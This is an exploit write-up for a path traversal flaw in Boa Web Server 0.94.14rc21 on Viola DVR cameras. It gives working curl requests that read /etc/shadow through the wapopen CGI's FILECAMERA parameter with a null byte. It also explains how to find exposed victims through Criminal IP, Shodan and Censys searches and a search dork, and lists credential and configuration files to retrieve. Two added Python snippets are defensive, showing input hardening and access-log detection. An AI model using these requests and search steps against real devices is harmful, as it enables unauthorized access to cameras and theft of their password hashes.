Exploiting Boa Webserver 0.94.14rc21 Path Traversal

Author: André Eichhofer

Precondition

There is a directory traversal vulnerability in Boa Web Server. Affected is Boa Web Server Version 0.94.14rc21. The server is vulnerable in combination with the Viola DVR VIO-4/1000 firmware, which must be installed on the server.

The /cgi-bin/wapopen CGI, which controls the web camera, must be running on the server. The application uses the FILECAMERA parameter, which allows the injection of ../.. because of improper input sanitisation. The parameter can be given the value FILECAMERA=../../etc/shadow%00, which retrieves the /etc/shadow file (%00 is a URL-encoded null byte, which terminates the path as seen by the C string functions in the CGI).
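To make the mechanism concrete from the defender's side, the following added example (not code from the write-up or from the Boa or Viola projects) models in Python the two behaviours described above and the check that prevents them. The camera directory /www/cam and the ".jpg" suffix appended by the CGI are assumptions for illustration; the real paths used by the firmware are not stated on this page.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed base directory for camera files (placeholder; the firmware's real
# location is not given in the write-up).
CAMERA_DIR = "/www/cam"


def naive_camera_path(filecamera: str) -> str:
    """Model of the vulnerable handling: the decoded parameter is glued onto
    the camera directory with no canonicalisation, and because a C string
    ends at the first NUL byte, a trailing %00 drops whatever suffix the
    CGI appends (an assumed ".jpg" here). Returns the path the kernel
    would actually resolve."""
    decoded = unquote(filecamera)
    path = CAMERA_DIR + "/" + decoded + ".jpg"
    truncated = path.split("\x00", 1)[0]     # what open(2) really sees
    return posixpath.normpath(truncated)


def safe_camera_path(filecamera: str) -> Optional[str]:
    """Hardened handling: reject NUL bytes, resolve the candidate against the
    base directory and insist the result is a plain file name directly inside
    it. Returns None for anything that should not be served."""
    decoded = unquote(filecamera)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(CAMERA_DIR, decoded))
    # Must stay inside the base directory after normalisation
    if not candidate.startswith(CAMERA_DIR + "/"):
        return None
    # Flat file names only: no subdirectories, no '..' left over
    if posixpath.dirname(candidate) != CAMERA_DIR:
        return None
    return candidate + ".jpg"


if __name__ == "__main__":
    for value in ("CAM_16", "../../etc/shadow%00", "../../etc/shadow", "/etc/passwd"):
        print(f"{value!r:28} naive={naive_camera_path(value)!r:24} safe={safe_camera_path(value)!r}")
```

The flat-file-name rule is stricter than strictly necessary; if legitimate camera files live in subdirectories, keep the prefix check and drop the dirname check, but never skip the NUL-byte rejection, since that is what lets the appended suffix be discarded.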

The vulnerability can be exploited using the following command:

curl "http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"

The exploit should also work without URL encoding:

curl "http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"

Note: keep the quotation marks around the URL when using curl; otherwise bash interprets the URL itself instead of passing it to curl as a single string.

Reconnaissance

Vulnerable hosts run Boa Web Server 0.94.14rc21 and have the wapopen application enabled.

Search for affected machines on https://www.criminalip.io using the search parameter product_version with the value 0.94.14r.

The engine will also return servers with version 0.94.14rc19, but there should be enough results with 0.94.14rc21. Search engines (Shodan, Censys, Criminal IP) cannot match the full version string 0.94.14rc21; you can modify the search string or search only for Boa Web Server.

The wapopen application must be enabled on the server, so target hosts must expose the URL

  • http://<domain>/cgi-bin/wapopen

Or use a search-engine dork:

  • inurl:/cgi-bin/wapopen

Exploitation

In many cases the server runs on a camera with the Viola DVR VIO-4/1000 firmware installed. In combination with the server, the firmware suffers from the path traversal vulnerability described above, and the attacker traverses the file system through the wapopen CGI. The wapopen CGI runs with root privileges, so all files can be accessed.

The following files can be retrieved from the server:

  • /etc/shadow
    could be exploited when SSH is enabled

  • /etc/boa/boa.conf
    Contains the configuration setting and the location of the log files

  • /bin/sh
    sh will most likely be installed on the server

Locate the Boa PID:

Access /proc/self/stat or /proc/self/status and look for the parent PID (PPid), which is the PID of the Boa server.
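On the detection side, requests of the kind shown above leave a clear trace in the web server access log. The following added example (not part of the write-up) scans Common Log Format lines for wapopen requests whose FILECAMERA value contains a null byte, a dot-dot segment or an absolute path, and reports which file the request would have reached. The log lines are constructed samples, and the base directory /www/cam used to resolve the target is an assumption.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Assumed directory the CGI resolves FILECAMERA against (placeholder).
CAMERA_DIR = "/www/cam"

# Constructed sample access log (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&FILECAMERA=../../etc/shadow%00&NAME=admin&PWD=admin HTTP/1.1" 200 1042
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&FILECAMERA=%2e%2e/%2e%2e/etc/boa/boa.conf&NAME=admin&PWD=admin HTTP/1.1" 200 2210
192.0.2.10 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&FILECAMERA=CAM_16&NAME=admin&PWD=admin HTTP/1.1" 200 8812
192.0.2.10 - - [10/Oct/2023:13:56:05 +0000] "GET /index.html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)


def decode_fully(value: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded '..' is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str):
    """Return the suspicious properties of a decoded FILECAMERA value and the
    part of it that a C-level open() would actually use."""
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")
    cleaned = value.split("\x00", 1)[0]
    if ".." in cleaned.split("/"):
        reasons.append("dot-dot-traversal")
    if cleaned.startswith("/"):
        reasons.append("absolute-path")
    return reasons, cleaned


def scan_access_log(text: str):
    """Yield one alert per wapopen request with a suspicious FILECAMERA value."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != "/cgi-bin/wapopen":
            continue
        # parse_qs already percent-decodes once; decode_fully catches a second layer
        for raw in parse_qs(url.query, keep_blank_values=True).get("FILECAMERA", []):
            reasons, cleaned = classify(decode_fully(raw))
            if reasons:
                alerts.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "status": int(m["status"]),
                    "reasons": reasons,
                    "target": posixpath.normpath(posixpath.join(CAMERA_DIR, cleaned)),
                })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

A 200 status on a flagged request is the signal worth paging on: it indicates the file was actually served, so the resolved target tells you which credential or configuration material to treat as exposed.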

More

searchsploit -x BOA Web Server 0.94.14rc21 - Arbitrary File Access

  • Viola DVR VIO-4/1000 path traversal
  • exploit-db.com/papers/44003
  • ush.it/team/ush/hack_httpd_escape/adv.txt
  • coresecurity.com/sites/default/files/private-files/publications/2016/05/corelabs-ipcams-research-falcon-riva.pdf